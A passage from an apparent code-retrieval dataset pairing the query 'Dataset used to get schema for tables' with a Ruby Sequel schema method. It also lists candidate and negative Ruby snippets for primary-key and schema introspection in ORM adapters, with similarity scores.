"def pk_and_sequence_for(table_name, owner = nil, desc_table_name = nil) # :nodoc:\n (owner, desc_table_name) = @raw_connection.describe(table_name)\n\n seqs = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"sequence_name\", default_sequence_name(desc_table_name))])\n select us.sequence_name\n from all_sequences us\n where us.sequence_owner = :owner\n and us.sequence_name = upper(:sequence_name)\n SQL\n\n # changed back from user_constraints to all_constraints for consistency\n pks = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"table_name\", desc_table_name)])\n SELECT cc.column_name\n FROM all_constraints c, all_cons_columns cc\n WHERE c.owner = :owner\n AND c.table_name = :table_name\n AND c.constraint_type = 'P'\n AND cc.owner = c.owner\n AND cc.constraint_name = c.constraint_name\n SQL\n\n warn <<~WARNING if pks.count > 1\n WARNING: Active Record does not support composite primary key.\n\n #{table_name} has composite primary key. Composite primary key is ignored.\n WARNING\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first),\n oracle_downcase(seqs.first)] : nil\n end",
"def primary_key\n @attributes[self.primary_key_attribute]\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def pk\n raise(Error, \"No primary key is associated with this model\") unless key = primary_key\n case key\n when Array\n key.collect{|k| @values[k]}\n else\n @values[key]\n end\n end",
"def primary_key\n case primary_key_prefix_type\n when :table_name\n Inflector.foreign_key(class_name_of_active_record_descendant(self), false)\n when :table_name_with_underscore\n Inflector.foreign_key(class_name_of_active_record_descendant(self))\n else\n \"id\"\n end\n end",
"def table_id\n\n end",
"def pk_hash\n model.primary_key_hash(pk)\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key(*attributes)\n if attributes.size == 1 and String===attributes[0]\n @relvar.set_primary_key(@relvar.candidate_key(attributes[0], true))\n else\n name = String===attributes[0] ? attributes.shift : \"pk_#{@relvar.name}\"\n attributes.unshift(name)\n @relvar.set_primary_key(candidate_key(*attributes))\n end\n end",
"def setup_columns\n if inheritable?\n SimpleSet.new([primary_key, inheritance_column])\n else\n primary_key.blank? ? SimpleSet.new : SimpleSet.new([primary_key])\n end \n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key_attr?(a)\n data_class && a[:name].to_s == data_class.primary_key\n end",
"def primary_key_attr?(a)\n data_class && a[:name].to_s == data_class.primary_key\n end",
"def _primary_key_order\n if @opts[:order].nil? && model && (pk = model.primary_key)\n cached_dataset(:_pk_order_ds){order(*pk)}\n end\n end",
"def _primary_key_order\n if @opts[:order].nil? && model && (pk = model.primary_key)\n cached_dataset(:_pk_order_ds){order(*pk)}\n end\n end",
"def primary_key\n primary_key = attributes.find { |a| a.primary_key? }\n error(\"Unable to locate primary key for #{self.name}, attributes => #{attributes.collect { |a| a.name }}\") unless primary_key\n primary_key\n end",
"def ids\n primary_key_array = Array(primary_key)\n\n if loaded?\n result = records.map do |record|\n if primary_key_array.one?\n record._read_attribute(primary_key_array.first)\n else\n primary_key_array.map { |column| record._read_attribute(column) }\n end\n end\n return @async ? Promise::Complete.new(result) : result\n end\n\n if has_include?(primary_key)\n relation = apply_join_dependency.group(*primary_key_array)\n return relation.ids\n end\n\n columns = arel_columns(primary_key_array)\n relation = spawn\n relation.select_values = columns\n\n result = if relation.where_clause.contradiction?\n ActiveRecord::Result.empty\n else\n skip_query_cache_if_necessary do\n klass.connection.select_all(relation, \"#{klass.name} Ids\", async: @async)\n end\n end\n\n result.then { |result| type_cast_pluck_values(result, columns) }\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def keys!\n @table.keys\n end",
"def master_pk(h)\n x = @master_primary_keys\n if x.is_a?(Array)\n unless x == []\n x = x.map{|ca| h[ca]}\n x if x.all?\n end\n else\n h[x]\n end\n end",
"def key(*fields)\n self.primary_key = fields\n identity(:type => String)\n set_callback :save, :before, :identify\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def scaffold_primary_key\n get_key_array_safe(key).name\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def orchestrate_primary_key\n id\n end",
"def allowed_keys\n field_names - [id_column]\n end"
] |
[
"0.77333367",
"0.7475051",
"0.7425205",
"0.7375289",
"0.7366104",
"0.72455585",
"0.7180687",
"0.7167466",
"0.7092792",
"0.70765555",
"0.706616",
"0.7043821",
"0.69874865",
"0.68165034",
"0.68044215",
"0.6772434",
"0.67652905",
"0.675731",
"0.67554665",
"0.6754021",
"0.6702185",
"0.6678628",
"0.6675176",
"0.66672254",
"0.6649987",
"0.6623577",
"0.6612956",
"0.65735036",
"0.6524573",
"0.6482793",
"0.6479449",
"0.6470976",
"0.6470976",
"0.64658296",
"0.6448546",
"0.64319026",
"0.6402581",
"0.6394426",
"0.638231",
"0.6379609",
"0.63760495",
"0.63543034",
"0.6331958",
"0.6315892",
"0.6274839",
"0.6272989",
"0.62656116",
"0.62519264",
"0.62337005",
"0.62328106",
"0.6213058",
"0.62014216",
"0.61891216",
"0.61837035",
"0.61793065",
"0.6176419",
"0.6162146",
"0.6160452",
"0.6152628",
"0.6152245",
"0.6141882",
"0.6137353",
"0.6119391",
"0.60881376",
"0.60844696",
"0.60835916",
"0.6075179",
"0.6073133",
"0.60728455",
"0.6060063",
"0.60545015",
"0.6053264",
"0.6052968",
"0.603363",
"0.6025873",
"0.6007904",
"0.59937006",
"0.5984959",
"0.5979275",
"0.5964162",
"0.5948063",
"0.5948063",
"0.5940324",
"0.5940324",
"0.59391075",
"0.5926405",
"0.5920673",
"0.59188396",
"0.5915631",
"0.59143543",
"0.5888498",
"0.5888498",
"0.58864224",
"0.5876702",
"0.5876702",
"0.5876702",
"0.5868904",
"0.5867012",
"0.5860776",
"0.5859786"
] |
0.75759834
|
1
|
Dataset used to get schema for tables
|
def _schema_ds
@_schema_ds ||= begin
ds = metadata_dataset.select{[
pg_attribute[:attname].as(:name),
SQL::Cast.new(pg_attribute[:atttypid], :integer).as(:oid),
SQL::Cast.new(basetype[:oid], :integer).as(:base_oid),
SQL::Function.new(:format_type, basetype[:oid], pg_type[:typtypmod]).as(:db_base_type),
SQL::Function.new(:format_type, pg_type[:oid], pg_attribute[:atttypmod]).as(:db_type),
SQL::Function.new(:pg_get_expr, pg_attrdef[:adbin], pg_class[:oid]).as(:default),
SQL::BooleanExpression.new(:NOT, pg_attribute[:attnotnull]).as(:allow_null),
SQL::Function.new(:COALESCE, SQL::BooleanExpression.from_value_pairs(pg_attribute[:attnum] => SQL::Function.new(:ANY, pg_index[:indkey])), false).as(:primary_key),
Sequel[:pg_type][:typtype],
(~Sequel[Sequel[:elementtype][:oid]=>nil]).as(:is_array),
]}.
from(:pg_class).
join(:pg_attribute, :attrelid=>:oid).
join(:pg_type, :oid=>:atttypid).
left_outer_join(Sequel[:pg_type].as(:basetype), :oid=>:typbasetype).
left_outer_join(Sequel[:pg_type].as(:elementtype), :typarray=>Sequel[:pg_type][:oid]).
left_outer_join(:pg_attrdef, :adrelid=>Sequel[:pg_class][:oid], :adnum=>Sequel[:pg_attribute][:attnum]).
left_outer_join(:pg_index, :indrelid=>Sequel[:pg_class][:oid], :indisprimary=>true).
where{{pg_attribute[:attisdropped]=>false}}.
where{pg_attribute[:attnum] > 0}.
order{pg_attribute[:attnum]}
# :nocov:
if server_version > 100000
# :nocov:
ds = ds.select_append{pg_attribute[:attidentity]}
# :nocov:
if server_version > 120000
# :nocov:
ds = ds.select_append{Sequel.~(pg_attribute[:attgenerated]=>'').as(:generated)}
end
end
ds
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def schema_and_table(table_name)\n schema_utility_dataset.schema_and_table(table_name)\n end",
"def schema_ds_from(table_name, opts)\n [:information_schema__tables___t]\n end",
"def tables(opts={})\n m = output_identifier_meth\n metadata_dataset.from(:information_schema__tables___t).\n select(:table_name).\n filter(:table_type=>'BASE TABLE', :table_schema=>(opts[:schema]||default_schema||'dbo').to_s).\n map{|x| m.call(x[:table_name])}\n end",
"def schema_ds(table_name, opts)\n schema_ds_dataset.from(*schema_ds_from(table_name, opts)) \\\n .select(*schema_ds_select(table_name, opts)) \\\n .join(*schema_ds_join(table_name, opts)) \\\n .filter(*schema_ds_filter(table_name, opts))\n end",
"def schema\n jiak.data.schema\n end",
"def schema\n adapter.schema\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def dataset\n database[table_name]\n end",
"def schema_parse_table(table, opts={})\n ds = dataset\n ds.identifier_output_method = :downcase\n schema_and_table = \"#{\"#{quote_identifier(opts[:schema])}.\" if opts[:schema]}#{quote_identifier(table)}\"\n table_schema = []\n metadata = transaction(opts){|conn| conn.describe_table(schema_and_table)}\n metadata.columns.each do |column|\n table_schema << [\n column.name.downcase.to_sym,\n {\n :type => column.data_type,\n :db_type => column.type_string.split(' ')[0],\n :type_string => column.type_string,\n :charset_form => column.charset_form,\n :char_used => column.char_used?,\n :char_size => column.char_size,\n :data_size => column.data_size,\n :precision => column.precision,\n :scale => column.scale,\n :fsprecision => column.fsprecision,\n :lfprecision => column.lfprecision,\n :allow_null => column.nullable?\n }\n ]\n end\n table_schema.instance_variable_set :@features, {\n :owner => :\"#{metadata.obj_schema.downcase}\",\n :clustered => (metadata.clustered? rescue nil),\n :temporary => (metadata.is_temporary? rescue nil),\n :partitioning => (metadata.partitioned? rescue nil),\n :typed => (metadata.is_typed? rescue nil),\n :index_only => (metadata.index_only? rescue nil)\n }\n table_schema\n end",
"def schema_utility_dataset\n @default_dataset\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n _schema_ds.where_all(Sequel[:pg_class][:oid]=>regclass_oid(table_name, opts)).map do |row|\n row[:default] = nil if blank_object?(row[:default])\n if row[:base_oid]\n row[:domain_oid] = row[:oid]\n row[:oid] = row.delete(:base_oid)\n row[:db_domain_type] = row[:db_type]\n row[:db_type] = row.delete(:db_base_type)\n else\n row.delete(:base_oid)\n row.delete(:db_base_type)\n end\n\n db_type = row[:db_type]\n row[:type] = if row.delete(:is_array)\n schema_array_type(db_type)\n else\n send(TYPTYPE_METHOD_MAP[row.delete(:typtype)], db_type)\n end\n identity = row.delete(:attidentity)\n if row[:primary_key]\n row[:auto_increment] = !!(row[:default] =~ /\\A(?:nextval)/i) || identity == 'a' || identity == 'd'\n end\n\n # :nocov:\n if server_version >= 90600\n # :nocov:\n case row[:oid]\n when 1082\n row[:min_value] = MIN_DATE\n row[:max_value] = MAX_DATE\n when 1184, 1114\n if Sequel.datetime_class == Time\n row[:min_value] = MIN_TIMESTAMP\n row[:max_value] = MAX_TIMESTAMP\n end\n end\n end\n\n [m.call(row.delete(:name)), row]\n end\n end",
"def get_tables\n get_schemas.keys\n end",
"def schema\n raise NotImplementedError\n end",
"def schema\n @schema ||= (default_schema || ETL::Schema::Table.new)\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def schema\n schema = Schema.new\n\n for name in db.tables\n next if IGNORED_TABLES.include? name\n table = schema.add_table( name )\n import_table( table )\n end\n\n schema\n end",
"def schema_meta_data\n schema = []\n # not sure if there needs to be a header element with the number of columns in it\n # would look sort of like this\n # header = SchemaElement.new\n # header.name = @csv.rows.first.first\n # header.num_children = num_rows\n # schema << header\n @csv.headers.each do |header|\n schema << Configurator.schema_element_with_defaults({\n name: header\n })\n end\n\n schema\n end",
"def schema(table, opts={})\n hero = execute(\"DESCRIBE #{table}\")\n hero.map do |h|\n [\n h[:col_name].strip.to_sym,\n { :db_type => h[:data_type].strip , :comment => h[:comment].strip }\n ]\n end\n end",
"def chooseSchema\n @metadata.chooseSchema\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth\n m2 = input_identifier_meth\n ds = metadata_dataset.from(:information_schema__tables___t).\n join(:information_schema__columns___c, :table_catalog=>:table_catalog,\n :table_schema => :table_schema, :table_name => :table_name).\n select(:column_name___column, :data_type___db_type, :character_maximum_length___max_chars, :column_default___default, :is_nullable___allow_null).\n filter(:c__table_name=>m2.call(table_name.to_s))\n if schema = opts[:schema] || default_schema\n ds.filter!(:table_schema=>schema)\n end\n ds.map do |row|\n row[:allow_null] = row[:allow_null] == 'YES' ? true : false\n row[:default] = nil if blank_object?(row[:default])\n row[:type] = schema_column_type(row[:db_type])\n [m.call(row.delete(:column)), row]\n end\n end",
"def table_name\n if qualified? && meta[:qualified].is_a?(Symbol)\n meta[:qualified]\n else\n source.dataset\n end\n end",
"def schema(table, opts={})\n hero = execute(\"DESCRIBE #{table}\")\n hero.map do |h|\n [ h[:col_name].to_sym, { :db_type => h[:data_type] , :comment => h[:comment] } ]\n end\n end",
"def schema_and_table(result)\n :\"#{result.schema}__#{self.implicit_table_name}\"\n end",
"def schema\n self.class.schema\n end",
"def schema_tables\n @schema_tables ||= %i[\n projects\n amazon_clouds\n data_centers\n jmeter_plans\n load_agents\n target_hosts\n clusters\n execution_cycles\n client_stats\n page_stats\n target_stats\n jtl_files\n ]\n end",
"def load_table_schema(conn, builder, table)\n builder.relvar(table){\n primary_key_columns = load_table_heading(conn, builder, table)\n load_table_constraints(conn, builder, table, primary_key_columns)\n }\n end",
"def schema\n []\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n table = if opts[:schema]\n Sequel.qualify(opts[:schema], table_name)\n else\n Sequel.identifier(table_name)\n end\n\n describe(table, opts).map do |row|\n row[:db_type] = row[:type]\n row[:type] = schema_column_type(row[:db_type])\n row[:default] = nil\n row[:primary_key] = false\n [m.call(row.delete(:name)), row]\n end\n end",
"def table_schema(tbl)\n column_sql = <<-eosql\nSELECT rf.rdb$field_name AS \"name\",\n field.rdb$field_type AS \"type_code\",\n field.rdb$field_sub_type AS \"subtype_code\",\n-- -- -- field.rdb$field_length AS \"length\", -- -- --\n field.rdb$field_precision AS \"precision\",\n field.rdb$field_scale AS \"scale\",\n CASE\n WHEN rf.rdb$null_flag > 0\n THEN 'NO'\n ELSE 'YES'\n END AS \"nullable\",\n CASE\n WHEN iseg.rdb$index_name IS NOT NULL\n THEN 'YES'\n ELSE 'NO'\n END AS \"primary_key\"\nFROM rdb$relation_fields rf\nJOIN rdb$fields field ON rf.rdb$field_source = field.rdb$field_name\nLEFT JOIN rdb$relation_constraints c\n ON c.rdb$relation_name = rf.rdb$relation_name\n AND\n c.rdb$constraint_type = 'PRIMARY KEY'\nLEFT JOIN rdb$index_segments iseg\n ON iseg.rdb$index_name = c.rdb$index_name\n AND\n iseg.rdb$field_name = rf.rdb$field_name\nWHERE rf.rdb$relation_name = ?\nORDER BY rf.rdb$field_position, rf.rdb$field_name\neosql\n\n info = RDBI::Schema.new([], [])\n res = execute(column_sql, tbl.to_s.upcase)\n res.as(:Struct)\n while row = res.fetch[0]\n type = RDBI::Driver::Rubyfb::Types::field_type_to_rubyfb(row[:type_code], row[:subtype_code])\n info.columns << RDBI::Column.new(\n row[:name].to_sym,\n type,\n RDBI::Driver::Rubyfb::Types::rubyfb_to_rdbi(type, row[:scale]),\n row[:precision],\n row[:scale],\n row[:nullable] == 'YES',\n #nil, # metadata\n #nil, # default\n #nil, # table\n )\n (info.columns[-1].primary_key = row[:primary_key] == 'YES') rescue nil # pk > rdbi 0.9.1\n end\n return unless info.columns.length > 0\n info.tables << tbl\n info\n end",
"def table_structure(table_name)\n execute('select * from information_schema.columns where table_schema = ?' \\\n 'AND table_name = ?', [schema, table_name])\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def schema_meta_structure\n CreateVersionsTableQuery.new.to_cql\n end",
"def schema(obj)\n y(obj.send(\"column_names\"))\nend",
"def list_tables\n data.keys\n end",
"def schema\n connection.schema\n end",
"def __create_meta_data_table_for schema\n ActiveRecord::Base.establish_connection(self.connection_data) unless schema.connected?\n\n # Clears the table cache for the schema (remove TableDoesNotExists if a table actually exists)\n schema.clear_cache!\n\n unless schema.table_exists?\n ActiveRecord::Schema.define do\n create_table schema.table_name do |t|\n t.column :version, :float\n end\n end\n end\n end",
"def get_db_schema(reload = reload_db_schema?)\n set_columns(nil)\n return nil unless @dataset\n schema_hash = {}\n ds_opts = dataset.opts\n get_columns = proc{check_non_connection_error{columns} || []}\n schema_array = check_non_connection_error(false){db.schema(dataset, :reload=>reload)} if db.supports_schema_parsing?\n if schema_array\n schema_array.each{|k,v| schema_hash[k] = v}\n\n # Set the primary key(s) based on the schema information,\n # if the schema information includes primary key information\n if schema_array.all?{|k,v| v.has_key?(:primary_key)}\n pks = schema_array.map{|k,v| k if v[:primary_key]}.compact\n pks.length > 0 ? set_primary_key(pks) : no_primary_key\n end\n\n if (select = ds_opts[:select]) && !(select.length == 1 && select.first.is_a?(SQL::ColumnAll))\n # We don't remove the columns from the schema_hash,\n # as it's possible they will be used for typecasting\n # even if they are not selected.\n cols = get_columns.call\n cols.each{|c| schema_hash[c] ||= {}}\n def_column_accessor(*schema_hash.keys)\n else\n # Dataset is for a single table with all columns,\n # so set the columns based on the order they were\n # returned by the schema.\n cols = schema_array.map{|k,v| k}\n set_columns(cols)\n # Also set the columns for the dataset, so the dataset\n # doesn't have to do a query to get them.\n dataset.send(:columns=, cols)\n end\n else\n # If the dataset uses multiple tables or custom sql or getting\n # the schema raised an error, just get the columns and\n # create an empty schema hash for it.\n get_columns.call.each{|c| schema_hash[c] = {}}\n end\n schema_hash\n end",
"def get_db_schema(reload = reload_db_schema?)\n set_columns(nil)\n return nil unless @dataset\n schema_hash = {}\n ds_opts = dataset.opts\n get_columns = proc{check_non_connection_error{columns} || []}\n schema_array = check_non_connection_error(false){db.schema(dataset, :reload=>reload)} if db.supports_schema_parsing?\n if schema_array\n schema_array.each{|k,v| schema_hash[k] = v}\n\n # Set the primary key(s) based on the schema information,\n # if the schema information includes primary key information\n if schema_array.all?{|k,v| v.has_key?(:primary_key)}\n pks = schema_array.map{|k,v| k if v[:primary_key]}.compact\n pks.length > 0 ? set_primary_key(pks) : no_primary_key\n end\n\n if (select = ds_opts[:select]) && !(select.length == 1 && select.first.is_a?(SQL::ColumnAll))\n # We don't remove the columns from the schema_hash,\n # as it's possible they will be used for typecasting\n # even if they are not selected.\n cols = get_columns.call\n cols.each{|c| schema_hash[c] ||= {}}\n def_column_accessor(*schema_hash.keys)\n else\n # Dataset is for a single table with all columns,\n # so set the columns based on the order they were\n # returned by the schema.\n cols = schema_array.map{|k,v| k}\n set_columns(cols)\n # Also set the columns for the dataset, so the dataset\n # doesn't have to do a query to get them.\n dataset.send(:columns=, cols)\n end\n else\n # If the dataset uses multiple tables or custom sql or getting\n # the schema raised an error, just get the columns and\n # create an empty schema hash for it.\n get_columns.call.each{|c| schema_hash[c] = {}}\n end\n schema_hash\n end",
"def schema\n @schema ||= metadata.ancestors('Schema').first\n end",
"def schema\n @schema ||= []\n end",
"def current_schemata\n extension :pg_array\n metadata_dataset.select(Sequel::function(:current_schemas, false).\n cast('varchar[]')).single_value.map(&:to_sym)\n end",
"def tables\n []\n end",
"def tables\n [\n ]\n end",
"def tables\n sanity_check\n @handle.tables\n end",
"def schema_definition\n of.schema_definition \n end",
"def schema_parse_tables(opts)\n schemas = {}\n schema_ds(nil, opts).each do |row|\n (schemas[row.delete(:table_name).to_sym] ||= []) << row\n end\n schemas.each do |table, rows|\n schemas[table] = schema_parse_rows(rows)\n end\n schemas\n end",
"def dataset\n @dataset ||= begin\n create_table!\n database[:data_stores]\n end\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def table_structure(table_name)\r\n sql = \"SELECT COLUMN_NAME, IIF(COLUMN_DEF = 'NULL', null, COLUMN_DEF) as COLUMN_DEF, TYPE_NAME, NULLABLE from (EXECUTE PROCEDURE sp_GetColumns( NULL, NULL, '#{table_name}', NULL )) spgc where table_cat <> 'system';\"\r\n structure = execute(sql, :skip_logging)\r\n raise(ActiveRecord::StatementInvalid, \"Could not find table '#{table_name}'\") if structure == false\r\n structure\r\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def get_tables\n tables\n end",
"def schema\n self\n end",
"def schema_data\n dev_schema\n rescue\n VetsJsonSchema::SCHEMAS[@schema_name]\n end",
"def schema(path = nil)\n s = \"ActiveRecord::Schema.define do\\n\"\n s << \" create_table \\\"#{File.basename(@data.path, \".*\")}\\\" do |t|\\n\"\n columns.each do |column|\n s << \" t.column #{column.schema_definition}\"\n end\n s << \" end\\nend\"\n \n if path\n File.open(path, 'w') {|f| f.puts(s)}\n end\n \n s\n end",
"def tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema]).map(&:first)\n end",
"def data\r\n tables_ret = []\r\n tables.list.each do |name, table|\r\n tables_ret << table.data\r\n end\r\n \r\n return {\r\n \"tables\" => tables_ret\r\n }\r\n end",
"def schema\n return @schema\n end",
"def schema\n hyper_schema_link.schema\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def schema_ds_filter(table_name, opts)\n if table_name\n [{:c__table_name=>table_name.to_s}]\n else\n [{:t__table_type=>'BASE TABLE'}]\n end\n end",
"def table_name\n dataset.first_source_alias\n end",
"def table_name\n dataset.first_source_alias\n end",
